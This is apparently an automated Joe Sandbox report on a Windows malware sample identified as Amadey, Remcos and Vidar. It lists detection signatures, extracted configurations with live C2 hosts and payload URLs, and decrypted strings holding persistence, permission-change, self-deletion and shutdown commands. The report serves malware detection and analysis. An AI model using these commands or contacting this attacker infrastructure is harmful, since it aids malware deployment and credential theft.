Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
yaALNupJCH.exe

Overview

General Information

Sample Name:yaALNupJCH.exe
Original Sample Name:b2ee13e6988e57f6731c20da3459c8dc.exe
Analysis ID:1315647
MD5:b2ee13e6988e57f6731c20da3459c8dc
SHA1:3be7be70961a381c48d35ba7d37add07a3e477a3
SHA256:6cb42cc70376a4ba12627c2f6755d4235beffe85a6600dc91ffd7c22cb61df96
Tags:Amadeyexe
Infos:

Detection

Amadey, Remcos, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Amadeys stealer DLL
Yara detected Amadey bot
Antivirus detection for URL or domain
Antivirus detection for dropped file
Snort IDS alert for network traffic
Found malware configuration
Yara detected UAC Bypass using CMSTP
Contains functionality to bypass UAC (CMSTPLUA)
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Remcos RAT
Antivirus / Scanner detection for submitted sample
Yara detected Vidar stealer
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Contains functionality to steal Firefox passwords or cookies
Uses known network protocols on non-standard ports
Machine Learning detection for sample
Injects a PE file into a foreign processes
Contains functionality to inject code into remote processes
Contains functionalty to change the wallpaper
Found many strings related to Crypto-Wallets (likely being stolen)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Delayed program exit found
Contains functionality to modify clipboard data
Contains functionality to steal Chrome passwords or cookies
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to enumerate running services
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to retrieve information about pressed keystrokes
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
PE file contains sections with non-standard names
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to read the clipboard data
Found dropped PE file which has not been started or loaded
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
AV process strings found (often used to terminate AV products)
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to download and launch executables
Contains functionality to launch a program with higher privileges
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to simulate mouse events

Classification

  • System is w10x64
  • yaALNupJCH.exe (PID: 7428 cmdline: C:\Users\user\Desktop\yaALNupJCH.exe MD5: B2EE13E6988E57F6731C20DA3459C8DC)
    • rundll32.exe (PID: 7504 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\Temp\1000026011\svchost.dll, STDAPI Start(void) MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • yaALNupJCH.exe (PID: 7536 cmdline: C:\Users\user\Desktop\yaALNupJCH.exe MD5: B2EE13E6988E57F6731C20DA3459C8DC)
    • yaALNupJCH.exe (PID: 7592 cmdline: C:\Users\user\Desktop\yaALNupJCH.exe MD5: B2EE13E6988E57F6731C20DA3459C8DC)
      • WerFault.exe (PID: 7720 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7592 -s 2020 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
{"C2 url": ["https://steamcommunity.com/profiles/76561199555780195", "https://t.me/solonichat"], "Botnet": "40eaa63b296d256c2181f079611d421f", "Version": "5.8"}
{"C2 url": "mardukoff.info/g9ecOb3jd/index.php", "Version": "3.89"}
{"Host:Port:Password": "81.19.131.36:2450:0", "Assigned name": "dfg", "Copy file": "remcos.exe", "Mutex": "dh-A9HL6N", "Keylog file": "logs.dat", "Screenshot file": "Screenshots", "Audio folder": "MicRecords", "Copy folder": "Remcos", "Keylog folder": "remcos"}
SourceRuleDescriptionAuthorStrings
yaALNupJCH.exeJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
    yaALNupJCH.exeWindows_Trojan_Amadey_7abb059bunknownunknown
    • 0x686f:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
    SourceRuleDescriptionAuthorStrings
    dump.pcapJoeSecurity_AmadeyYara detected Amadey botJoe Security
      dump.pcapWindows_Trojan_Remcos_b296e965unknownunknown
      • 0xce54f:$a1: Remcos restarted by watchdog!
      • 0xceb9f:$a3: %02i:%02i:%02i:%03i
      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\host[1].exeJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\svchost[1].dllJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          C:\Users\user\AppData\Local\Temp\1000026011\svchost.dllJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\svchost[1].exeJoeSecurity_RemcosYara detected Remcos RATJoe Security
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\svchost[1].exeJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                Click to see the 3 entries
                SourceRuleDescriptionAuthorStrings
                00000000.00000003.1025833709.000000000150F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_AmadeyYara detected Amadey botJoe Security
                  00000000.00000002.1399167458.000000000156E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_AmadeyYara detected Amadey botJoe Security
                    00000003.00000002.907271529.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                      00000002.00000002.1399184360.0000000000DC7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
                        00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                          Click to see the 44 entries
                          SourceRuleDescriptionAuthorStrings
                          2.2.yaALNupJCH.exe.cb0000.1.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                            3.0.yaALNupJCH.exe.cb0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                              2.2.yaALNupJCH.exe.cb0000.1.unpackWindows_Trojan_Amadey_7abb059bunknownunknown
                              • 0x686f:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
                              3.0.yaALNupJCH.exe.cb0000.0.unpackWindows_Trojan_Amadey_7abb059bunknownunknown
                              • 0x686f:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
                              0.2.yaALNupJCH.exe.cb0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                                Click to see the 19 entries
                                No Sigma rule has matched
                                Timestamp:192.168.2.395.141.41.1249794802027700 09/28/23-06:01:52.097963
                                SID:2027700
                                Source Port:49794
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Source: http://transdi.org/host.exe3jd/index.php0cAvira URL Cloud: Label: malware
                                Source: http://transdi.org/host.exeZAvira URL Cloud: Label: malware
                                Source: http://transdi.org/host.exe8Avira URL Cloud: Label: malware
                                Source: http://transdi.org/host.exe5Avira URL Cloud: Label: malware
                                Source: http://transdi.org/svchost.dllAvira URL Cloud: Label: malware
                                Source: http://transdi.org/host.exeAvira URL Cloud: Label: malware
                                Source: http://transdi.org/host.exe=oAvira URL Cloud: Label: malware
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\host[1].exeAvira: detection malicious, Label: TR/AD.GenSteal.aekjv
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\svchost[1].exeAvira: detection malicious, Label: BDS/Backdoor.Gen
                                Source: yaALNupJCH.exeMalware Configuration Extractor: Amadey {"C2 url": "mardukoff.info/g9ecOb3jd/index.php", "Version": "3.89"}
                                Source: 00000003.00000002.907271529.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199555780195", "https://t.me/solonichat"], "Botnet": "40eaa63b296d256c2181f079611d421f", "Version": "5.8"}
                                Source: 00000002.00000002.1399184360.0000000000DC7000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "81.19.131.36:2450:0", "Assigned name": "dfg", "Copy file": "remcos.exe", "Mutex": "dh-A9HL6N", "Keylog file": "logs.dat", "Screenshot file": "Screenshots", "Audio folder": "MicRecords", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                                Source: yaALNupJCH.exeReversingLabs: Detection: 76%
                                Source: yaALNupJCH.exeVirustotal: Detection: 73%Perma Link
                                Source: Yara matchFile source: 2.2.yaALNupJCH.exe.400000.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 2.2.yaALNupJCH.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000002.00000002.1399184360.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.882874525.00000000040ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000002.1399333427.00000000040ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: yaALNupJCH.exe PID: 7428, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: yaALNupJCH.exe PID: 7536, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\svchost[1].exe, type: DROPPED
                                Source: yaALNupJCH.exeAvira: detected
                                Source: transdi.orgVirustotal: Detection: 6%Perma Link
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\host[1].exeReversingLabs: Detection: 62%
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\svchost[1].dllReversingLabs: Detection: 52%
                                Source: C:\Users\user\AppData\Local\Temp\1000026011\svchost.dllReversingLabs: Detection: 52%
                                Source: yaALNupJCH.exeJoe Sandbox ML: detected
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: 95.141.41.12
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: /n9kd3X/index.php
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: mardukoff.info
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: /g9ecOb3jd/index.php
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: 3.89
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: S-%lu-
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: %-lu
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: -%lu
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: 8e8f2ea80a
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: nhdues.exe
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: SCHTASKS
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: /Create /SC MINUTE /MO 1 /TN
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: /TR "
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: " /F
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: Startup
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: cmd /C RMDIR /s/q
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: rundll32
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: /Delete /TN "
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: Programs
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: %USERPROFILE%
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: \App
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: POST
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: &vs=
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: &sd=
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: &os=
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: &bi=
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: &ar=
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: &pc=
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: &un=
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: &dm=
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: &av=
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: &lv=
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: &og=
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: cred.dll|clip.dll|
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: Main
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: http://
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: https://
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: Plugins/
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: &unit=
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: shell32.dll
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: kernel32.dll
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: GetNativeSystemInfo
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: ProgramData\
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: AVAST Software
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: Avira
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: Kaspersky Lab
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: ESET
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: Panda Security
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: Doctor Web
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: 360TotalSecurity
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: Bitdefender
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: Norton
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: Sophos
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: Comodo
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: WinDefender
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: 0123456789
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: ------
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: ?scr=1
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: .jpg
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: Content-Type: application/x-www-form-urlencoded
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: ComputerName
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: -unicode-
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: VideoID
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: \0000
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: DefaultSettings.XResolution
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: DefaultSettings.YResolution
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: ProductName
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: 2019
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: 2022
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: 2016
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: CurrentBuild
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: echo Y|CACLS "
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: " /P "
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: CACLS "
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: :R" /E
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: :F" /E
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: &&Exit
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: rundll32.exe
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: "taskkill /f /im "
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: " && timeout 1 && del
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: && Exit"
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: " && ren
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: &&
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: Powershell.exe
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: -executionpolicy remotesigned -File "
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: shutdown -s -t 0
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: jg"
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: G
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: 9]
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: nx/
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: !
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: ~[
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: /-8'
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: LNS@
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: "us+
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: "rd+
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: "ns+
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: "ai+
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: "`r+
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: "|c+
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: "tn+
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: "cm+
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: "`v+
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: "kv+
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: "ng+
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: ARE@
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: *ipP
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: .<1'
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: .<1"
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: C
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpackString decryptor: 5V
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\host[1].exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\svchost[1].dllJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\1000026011\svchost.dllJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\svchost[1].exeJoe Sandbox ML: detected
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_00433785 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,2_2_00433785
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_004096F5 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,_memset,CryptBinaryToStringA,3_2_004096F5
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_0041195E CryptUnprotectData,LocalAlloc,_memmove,LocalFree,3_2_0041195E
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_00411733 _memset,lstrlenA,CryptStringToBinaryA,_memmove,lstrcat,lstrcat,3_2_00411733
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_004118FB CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,3_2_004118FB
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_00411A77 _malloc,_memmove,_malloc,CryptUnprotectData,_memmove,3_2_00411A77
                                Source: yaALNupJCH.exe, 00000000.00000003.882874525.00000000040ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_882dc30d-a

                                Exploits

                                barindex
                                Source: Yara matchFile source: 2.2.yaALNupJCH.exe.400000.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 2.2.yaALNupJCH.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000000.00000003.882874525.00000000040ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000002.1399333427.00000000040ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: yaALNupJCH.exe PID: 7428, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: yaALNupJCH.exe PID: 7536, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\svchost[1].exe, type: DROPPED

                                Privilege Escalation

                                barindex
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_004074FD _wcslen,CoGetObject,2_2_004074FD
                                Source: yaALNupJCH.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49808 version: TLS 1.2
                                Source: yaALNupJCH.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: yaALNupJCH.exe
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,2_2_00407C97
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 0_2_00CCBB8B FindFirstFileExW,0_2_00CCBB8B
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_0041C1DF FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,2_2_0041C1DF
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,2_2_00409253
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_0040C29B FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,2_2_0040C29B
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,2_2_00409665
